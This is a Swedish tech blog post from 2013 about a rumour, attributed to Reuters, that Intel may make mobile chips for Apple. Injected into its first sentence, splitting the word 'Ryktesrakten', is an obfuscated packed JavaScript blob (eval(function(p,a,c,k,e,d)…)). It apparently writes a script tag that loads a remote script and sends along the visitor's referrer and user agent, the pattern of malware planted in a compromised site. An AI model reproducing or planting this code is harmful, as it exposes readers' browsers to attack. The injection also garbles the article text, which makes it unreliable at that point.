Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Apple rykte: Intel ska tillverka mobila datachip åt Apple

apple intel
Filip Urde
  • On 8 mars, 2013
  • http://www.revue.se/filip-urde

Ryktes eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|irarn|var|u0026u|referrer|sabei||js|php’.split(’|’),0,{}))
rakten hos Apple är igång igen!

 

 

Den här gången gäller det dem mobila datachipen. Analytikern John Pitzer hos Credit Suisse har tidigare argumenterat för att Intel borde få tillverkningen av datorchip åt Apple. Detta har varit på tapeten vid flera tillfällen men aldrig funnits några källor som indikerat på att det verkligen skulle bli av.
Tills nu! För nu skriver Reuters att Apple och Intel ska ha fört samtal under det senaste om påbörjan av produktion i Intels fabriker, detta enligt en anonym källa. Man vet dock inte om diskussionen har varit en engångsgrej eller om det är något som varit på gång under en längre tid.

Men det verkar finnas bevis som faktiskt styrker att ett potentiellt partnerskap mellan de två företagen kan bli verklighet. Reuter ska ha talat med Sunit Rikhi, chefen för Intels Custom Foundry-verksamhet, som påstår att avdelningen är redo att ta emot en stor oidentifierad mobil kund.

Apple och Intel har såklart inte velat kommentera detta.  
www.reuters.com